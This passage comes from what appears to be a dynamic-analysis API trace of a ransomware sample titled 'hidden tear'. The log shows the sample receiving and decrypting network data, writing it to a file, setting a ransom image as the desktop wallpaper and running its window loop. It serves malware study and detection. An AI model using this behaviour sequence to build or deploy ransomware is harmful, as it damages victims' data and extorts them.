lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x3000, lpOverlapped=0x0) returned 1 [0075.645] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0075.645] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 4128 [0075.645] DecryptMessage (in: phContext=0x267177c, pMessage=0x26e6358, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26e6358, pfQOP=0x0) returned 0x0 [0075.646] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0075.646] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0075.646] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 3316 [0075.646] recv (in: s=0x51c, buf=0x2650975, len=812, flags=0 | out: buf=0x2650975*) returned 812 [0075.695] DecryptMessage (in: phContext=0x267177c, pMessage=0x26e646c, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26e646c, pfQOP=0x0) returned 0x0 [0075.695] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0075.695] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0075.695] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 4128 [0075.695] DecryptMessage (in: phContext=0x267177c, pMessage=0x26e6580, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26e6580, pfQOP=0x0) returned 0x0 [0075.695] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0075.696] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0075.696] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 3810 [0075.696] recv (in: s=0x51c, buf=0x2650b63, len=318, flags=0 | out: buf=0x2650b63*) returned 318 [0075.700] DecryptMessage (in: phContext=0x267177c, pMessage=0x26e6694, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26e6694, pfQOP=0x0) returned 0x0 [0075.700] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0075.700] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0075.700] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 4128 [0075.700] DecryptMessage (in: phContext=0x267177c, pMessage=0x26e67a8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26e67a8, pfQOP=0x0) returned 0x0 [0075.701] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0075.701] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0075.701] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 1384 [0075.701] recv (in: s=0x51c, buf=0x26501e9, len=2744, flags=0 | out: buf=0x26501e9*) returned 2744 [0075.711] DecryptMessage (in: phContext=0x267177c, pMessage=0x26e68bc, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26e68bc, pfQOP=0x0) returned 0x0 [0075.711] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0075.711] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0075.711] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 3091 [0075.712] recv (in: s=0x51c, buf=0x2650894, len=1037, flags=0 | out: buf=0x2650894*) returned 1037 [0075.951] DecryptMessage (in: phContext=0x267177c, pMessage=0x26e69d0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26e69d0, pfQOP=0x0) returned 0x0 [0075.951] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0075.951] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0075.952] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 4128 [0075.952] DecryptMessage (in: phContext=0x267177c, pMessage=0x26e6ae4, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26e6ae4, pfQOP=0x0) returned 0x0 [0075.952] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0075.952] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0075.952] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 4128 [0075.952] DecryptMessage (in: phContext=0x267177c, pMessage=0x26e6bf8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26e6bf8, pfQOP=0x0) returned 0x0 [0075.952] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0075.953] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0075.953] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 4128 [0075.953] DecryptMessage (in: phContext=0x267177c, pMessage=0x26e6d0c, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26e6d0c, pfQOP=0x0) returned 0x0 [0075.953] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0075.953] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0075.953] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 4128 [0075.953] DecryptMessage (in: phContext=0x267177c, pMessage=0x26e6e20, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26e6e20, pfQOP=0x0) returned 0x0 [0075.953] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0075.954] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0075.954] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 4128 [0075.954] DecryptMessage (in: phContext=0x267177c, pMessage=0x26e6f34, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26e6f34, pfQOP=0x0) returned 0x0 [0075.954] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0075.954] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0075.954] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 4128 [0075.954] DecryptMessage (in: phContext=0x267177c, pMessage=0x26e7048, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26e7048, pfQOP=0x0) returned 0x0 [0075.954] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0075.955] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0075.955] recv (in: s=0x51c, buf=0x264fc81, len=12320, flags=0 | out: buf=0x264fc81*) returned 3360 [0075.955] recv (in: s=0x51c, buf=0x26509a1, len=8960, flags=0 | out: buf=0x26509a1*) returned 8960 [0076.033] DecryptMessage (in: phContext=0x267177c, pMessage=0x26e715c, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26e715c, pfQOP=0x0) returned 0x0 [0076.033] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x3000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x3000, lpOverlapped=0x0) returned 1 [0076.034] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0076.034] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 4128 [0076.034] DecryptMessage (in: phContext=0x267177c, pMessage=0x26e7270, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26e7270, pfQOP=0x0) returned 0x0 [0076.034] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0076.035] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0076.035] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 4128 [0076.035] DecryptMessage (in: phContext=0x267177c, pMessage=0x26e7384, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26e7384, pfQOP=0x0) returned 0x0 [0076.035] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0076.035] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0076.035] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 4128 [0076.035] DecryptMessage (in: phContext=0x267177c, pMessage=0x26e7498, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26e7498, pfQOP=0x0) returned 0x0 [0076.036] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0076.036] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0076.036] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 4128 [0076.036] DecryptMessage (in: phContext=0x267177c, pMessage=0x26e75ac, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26e75ac, pfQOP=0x0) returned 0x0 [0076.036] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0076.036] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0076.037] recv (in: s=0x51c, buf=0x264fc81, len=1904, flags=0 | out: buf=0x264fc81*) returned 1904 [0076.037] DecryptMessage (in: phContext=0x267177c, pMessage=0x26e76c0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26e76c0, pfQOP=0x0) returned 0x0 [0076.037] WriteFile (in: hFile=0x518, lpBuffer=0x26d9618*, nNumberOfBytesToWrite=0x758, lpNumberOfBytesWritten=0x5beba4, lpOverlapped=0x0 | out: lpBuffer=0x26d9618*, lpNumberOfBytesWritten=0x5beba4*=0x758, lpOverlapped=0x0) returned 1 [0076.037] CloseHandle (hObject=0x518) returned 1 [0076.094] SystemParametersInfoW (in: uiAction=0x14, uiParam=0x0, pvParam="C:\\FD1HVy\\ransom.jpg" (normalized: "c:\\fd1hvy\\ransom.jpg"), fWinIni=0x3 | out: pvParam=0x262d750) returned 1 [0076.638] CallWindowProcW (lpPrevWndFunc=0x74600140, hWnd=0x40212, Msg=0x1a, wParam=0x14, lParam=0x4bd158) returned 0x0 [0076.638] CallWindowProcW (lpPrevWndFunc=0x74600140, hWnd=0x70030, Msg=0x1a, wParam=0x14, lParam=0x4bd158) returned 0x0 [0076.645] SystemParametersInfoW (in: uiAction=0x26, uiParam=0x0, pvParam=0x5be7f0, fWinIni=0x0 | out: pvParam=0x5be7f0) returned 1 [0076.655] LocalAlloc (uFlags=0x0, uBytes=0x2) returned 0xa87220 [0076.655] PostMessageW (hWnd=0x60044, Msg=0x201a, wParam=0x14, lParam=0xa87220) returned 1 [0076.655] NtdllDefWindowProc_W (hWnd=0x60044, Msg=0x1a, wParam=0x14, lParam=0x4bd158) returned 0x0 [0077.090] QueryPerformanceCounter (in: lpPerformanceCount=0x5bebc4 | out: lpPerformanceCount=0x5bebc4*=16855218513) returned 1 [0077.090] SetEvent (hEvent=0x2d4) returned 1 [0077.090] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x5be9cc*=0x494, lpdwindex=0x5be7ec | out: lpdwindex=0x5be7ec) returned 0x80010115 [0077.090] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x5be9ac*=0x484, lpdwindex=0x5be7cc | out: lpdwindex=0x5be7cc) returned 0x80010115 [0077.091] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x5be9ac*=0x48c, lpdwindex=0x5be7cc | out: lpdwindex=0x5be7cc) returned 0x80010115 [0077.091] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x5bea00*=0x4b4, lpdwindex=0x5be81c | out: lpdwindex=0x5be81c) returned 0x80010115 [0077.091] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x5bea00*=0x4bc, lpdwindex=0x5be81c | out: lpdwindex=0x5be81c) returned 0x80010115 [0077.092] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x5bea00*=0x4c4, lpdwindex=0x5be81c | out: lpdwindex=0x5be81c) returned 0x80010115 [0077.092] select (in: nfds=0, readfds=0x26e9528, writefds=0x0, exceptfds=0x0, timeout=0x5bea98 | out: readfds=0x26e9528, writefds=0x0, exceptfds=0x0) returned 0 [0077.092] EncryptMessage (in: phContext=0x267177c, fQOP=0x0, pMessage=0x26e9f90, MessageSeqNo=0x0 | out: pMessage=0x26e9f90) returned 0x0 [0077.093] send (s=0x51c, buf=0x2645058*, len=170, flags=0) returned 170 [0077.093] setsockopt (s=0x51c, level=65535, optname=4102, optval="\xa0\x86\x01", optlen=4) returned 0 [0077.093] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0077.223] recv (in: s=0x51c, buf=0x264fc81, len=288, flags=0 | out: buf=0x264fc81*) returned 288 [0077.223] DecryptMessage (in: phContext=0x267177c, pMessage=0x26ea0b8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26ea0b8, pfQOP=0x0) returned 0x0 [0077.280] GetWindowThreadProcessId (in: hWnd=0x70030, lpdwProcessId=0x5becd0 | out: lpdwProcessId=0x5becd0) returned 0x6ac [0077.280] GetCurrentThreadId () returned 0x6ac [0077.281] RegisterClipboardFormatW (lpszFormat="WindowsForms12_ThreadCallbackMessage") returned 0xc176 [0077.281] PostMessageW (hWnd=0x70030, Msg=0xc176, wParam=0x0, lParam=0x0) returned 1 [0077.281] GetWindowTextLengthW (hWnd=0x70030) returned 11 [0077.281] CallWindowProcW (lpPrevWndFunc=0x74600140, hWnd=0x70030, Msg=0xe, wParam=0x0, lParam=0x0) returned 0xb [0077.281] GetSystemMetrics (nIndex=42) returned 0 [0077.281] GetWindowTextW (in: hWnd=0x70030, lpString=0x5bec44, nMaxCount=12 | out: lpString="hidden tear") returned 11 [0077.281] CallWindowProcW (lpPrevWndFunc=0x74600140, hWnd=0x70030, Msg=0xd, wParam=0xc, lParam=0x5bec44) returned 0xb [0077.283] OleInitialize (pvReserved=0x0) returned 0x0 [0077.283] CoRegisterMessageFilter (in: lpMessageFilter=0x0, lplpMessageFilter=0x5bf1fc | out: lplpMessageFilter=0x5bf1fc*=0x0) returned 0x0 [0077.284] PeekMessageW (in: lpMsg=0x5bf1d0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x5bf1d0) returned 1 [0077.284] IsWindowUnicode (hWnd=0x70030) returned 1 [0077.284] GetMessageW (in: lpMsg=0x5bf1d0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x5bf1d0) returned 1 [0077.285] TranslateMessage (lpMsg=0x5bf1d0) returned 0 [0077.285] DispatchMessageW (lpMsg=0x5bf1d0) returned 0x0 [0077.286] CallWindowProcW (lpPrevWndFunc=0x74600140, hWnd=0x70030, Msg=0x46, wParam=0x0, lParam=0x5bef24) returned 0x0 [0077.286] CallWindowProcW (lpPrevWndFunc=0x74600140, hWnd=0x70030, Msg=0x83, wParam=0x1, lParam=0x5beefc) returned 0x0 [0077.286] CallWindowProcW (lpPrevWndFunc=0x74600140, hWnd=0x70030, Msg=0x85, wParam=0x5040732, lParam=0x0) returned 0x0 [0077.287] GetWindowPlacement (in: hWnd=0x70030, lpwndpl=0x5bec6c | out: lpwndpl=0x5bec6c) returned 1 [0077.287] GetClientRect (in: hWnd=0x70030, lpRect=0x5bec18 | out: lpRect=0x5bec18) returned 1 [0077.287] GetWindowTextLengthW (hWnd=0x70030) returned 11 [0077.287] CallWindowProcW (lpPrevWndFunc=0x74600140, hWnd=0x70030, Msg=0xe, wParam=0x0, lParam=0x0) returned 0xb [0077.287] GetSystemMetrics (nIndex=42) returned 0 [0077.287] GetWindowTextW (in: hWnd=0x70030, lpString=0x5bead8, nMaxCount=12 | out: lpString="hidden tear") returned 11 [0077.287] CallWindowProcW (lpPrevWndFunc=0x74600140, hWnd=0x70030, Msg=0xd, wParam=0xc, lParam=0x5bead8) returned 0xb [0077.287] GetClientRect (in: hWnd=0x70030, lpRect=0x5beb20 | out: lpRect=0x5beb20) returned 1 [0077.287] GetCurrentObject (hdc=0x50106f6, type=0x1) returned 0xb00017 [0077.287] GetCurrentObject (hdc=0x50106f6, type=0x2) returned 0x900010 [0077.287] GetCurrentObject (hdc=0x50106f6, type=0x7) returned 0xc05072a [0077.287] GetCurrentObject (hdc=0x50106f6, type=0x6) returned 0x8a01c2 [0077.287] SaveDC (hdc=0x50106f6) returned 1 [0077.287] GetNearestColor (hdc=0x50106f6, color=0xf0f0f0) returned 0xf0f0f0 [0077.287] CreateSolidBrush (color=0xf0f0f0) returned 0x2510019f [0077.287] FillRect (hDC=0x50106f6, lprc=0x5be9c0, hbr=0x2510019f) returned 1 [0077.287] DeleteObject (ho=0x2510019f) returned 1 [0077.287] RestoreDC (hdc=0x50106f6, nSavedDC=-1) returned 1 [0077.288] GetWindowPlacement (in: hWnd=0x70030, lpwndpl=0x5bec50 | out: lpwndpl=0x5bec50) returned 1 [0077.288] CallWindowProcW (lpPrevWndFunc=0x74600140, hWnd=0x70030, Msg=0x47, wParam=0x0, lParam=0x5bef24) returned 0x0 [0077.288] GetClientRect (in: hWnd=0x70030, lpRect=0x5bec00 | out: lpRect=0x5bec00) returned 1 [0077.288] GetWindowRect (in: hWnd=0x70030, lpRect=0x5bec00 | out: lpRect=0x5bec00) returned 1 [0077.288] CallWindowProcW (lpPrevWndFunc=0x74600140, hWnd=0x70030, Msg=0x83, wParam=0x1, lParam=0x5bea3c) returned 0x0 [0077.289] CallWindowProcW (lpPrevWndFunc=0x74600140, hWnd=0x70030, Msg=0x85, wParam=0x8040732, lParam=0x0) returned 0x0 [0077.290] GetWindowPlacement (in: hWnd=0x70030, lpwndpl=0x5be7ac | out: lpwndpl=0x5be7ac) returned 1 [0077.290] GetClientRect (in: hWnd=0x70030, lpRect=0x5be758 | out: lpRect=0x5be758) returned 1 [0077.290] GetWindowTextLengthW (hWnd=0x70030) returned 11 [0077.290] CallWindowProcW (lpPrevWndFunc=0x74600140, hWnd=0x70030, Msg=0xe, wParam=0x0, lParam=0x0) returned 0xb [0077.290] GetSystemMetrics (nIndex=42) returned 0 [0077.290] GetWindowTextW (in: hWnd=0x70030, lpString=0x5be618, nMaxCount=12 | out: lpString="hidden tear") returned 11 [0077.290] CallWindowProcW (lpPrevWndFunc=0x74600140, hWnd=0x70030, Msg=0xd, wParam=0xc, lParam=0x5be618) returned 0xb [0077.290] GetClientRect (in: hWnd=0x70030, lpRect=0x5be660 | out: lpRect=0x5be660) returned 1 [0077.290] GetCurrentObject (hdc=0x60100ce, type=0x1) returned 0xb00017 [0077.290] GetCurrentObject (hdc=0x60100ce, type=0x2) returned 0x900010 [0077.290] GetCurrentObject (hdc=0x60100ce, type=0x7) returned 0xc05072a [0077.290] GetCurrentObject (hdc=0x60100ce, type=0x6) returned 0x8a01c2 [0077.290] SaveDC (hdc=0x60100ce) returned 1 [0077.290] GetNearestColor (hdc=0x60100ce, color=0xf0f0f0) returned 0xf0f0f0 [0077.290] CreateSolidBrush (color=0xf0f0f0) returned 0x2610019f [0077.290] FillRect (hDC=0x60100ce, lprc=0x5be500, hbr=0x2610019f) returned 1 [0077.290] DeleteObject (ho=0x2610019f) returned 1 [0077.290] RestoreDC (hdc=0x60100ce, nSavedDC=-1) returned 1 [0077.291] CallWindowProcW (lpPrevWndFunc=0x74600140, hWnd=0x70030, Msg=0x31f, wParam=0x1, lParam=0x0) returned 0x0 [0077.291] PeekMessageW (in: lpMsg=0x5bf1d0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x5bf1d0) returned 1 [0077.291] IsWindowUnicode (hWnd=0x40212) returned 1 [0077.291] GetMessageW (in: lpMsg=0x5bf1d0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x5bf1d0) returned 1 [0077.291] TranslateMessage (lpMsg=0x5bf1d0) returned 0 [0077.291] DispatchMessageW (lpMsg=0x5bf1d0) returned 0x0 [0077.291] CallWindowProcW (lpPrevWndFunc=0x74600140, hWnd=0x40212, Msg=0x31f, wParam=0x1, lParam=0x0) returned 0x0 [0077.291] PeekMessageW (in: lpMsg=0x5bf1d0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x5bf1d0) returned 1 [0077.291] IsWindowUnicode (hWnd=0x60044) returned 1 [0077.291] GetMessageW (in: lpMsg=0x5bf1d0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x5bf1d0) returned 1 [0077.291] TranslateMessage (lpMsg=0x5bf1d0) returned 0 [0077.291] DispatchMessageW (lpMsg=0x5bf1d0) returned 0x0 [0077.314] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\Marozka.exe", nBufferLength=0x105, lpBuffer=0x5be880, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\Marozka.exe", lpFilePart=0x0) returned 0x23 [0077.314] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\Marozka.exe", nBufferLength=0x105, lpBuffer=0x5be7f8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\Marozka.exe", lpFilePart=0x0) returned 0x23 [0077.314] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\Marozka.exe", nBufferLength=0x105, lpBuffer=0x5be850, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\Marozka.exe", lpFilePart=0x0) returned 0x23 [0077.314] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bed04) returned 1 [0077.314] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\Marozka.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\marozka.exe"), fInfoLevelId=0x0, lpFileInformation=0x5bed80 | out: lpFileInformation=0x5bed80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0077.315] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bed00) returned 1 [0077.319] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\Marozka.exe", nBufferLength=0x105, lpBuffer=0x5be858, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\Marozka.exe", lpFilePart=0x0) returned 0x23 [0077.319] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\Marozka.exe", nBufferLength=0x105, lpBuffer=0x5be7ec, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\Marozka.exe", lpFilePart=0x0) returned 0x23 [0077.328] GetWindowThreadProcessId (in: hWnd=0x401f8, lpdwProcessId=0x5bedfc | out: lpdwProcessId=0x5bedfc) returned 0x6ac [0077.328] GetCurrentThreadId () returned 0x6ac [0077.339] GetWindowThreadProcessId (in: hWnd=0x401f8, lpdwProcessId=0x5bedfc | out: lpdwProcessId=0x5bedfc) returned 0x6ac [0077.339] GetCurrentThreadId () returned 0x6ac [0077.341] LocalFree (hMem=0xa65210) returned 0x0 [0077.341] NtdllDefWindowProc_W (hWnd=0x60044, Msg=0x201a, wParam=0x0, lParam=0xa65210) returned 0x0 [0077.341] PeekMessageW (in: lpMsg=0x5bf1d0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x5bf1d0) returned 1 [0077.341] IsWindowUnicode (hWnd=0x60044) returned 1 [0077.341] GetMessageW (in: lpMsg=0x5bf1d0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x5bf1d0) returned 1 [0077.341] TranslateMessage (lpMsg=0x5bf1d0) returned 0 [0077.341] DispatchMessageW (lpMsg=0x5bf1d0) returned 0x0 [0077.341] GetWindowThreadProcessId (in: hWnd=0x401f8, lpdwProcessId=0x5bedfc | out: lpdwProcessId=0x5bedfc) returned 0x6ac [0077.341] GetCurrentThreadId () returned 0x6ac [0077.341] GetWindowThreadProcessId (in: hWnd=0x401f8, lpdwProcessId=0x5bedfc | out: lpdwProcessId=0x5bedfc) returned 0x6ac [0077.341] GetCurrentThreadId () returned 0x6ac [0077.341] LocalFree (hMem=0xa87220) returned 0x0 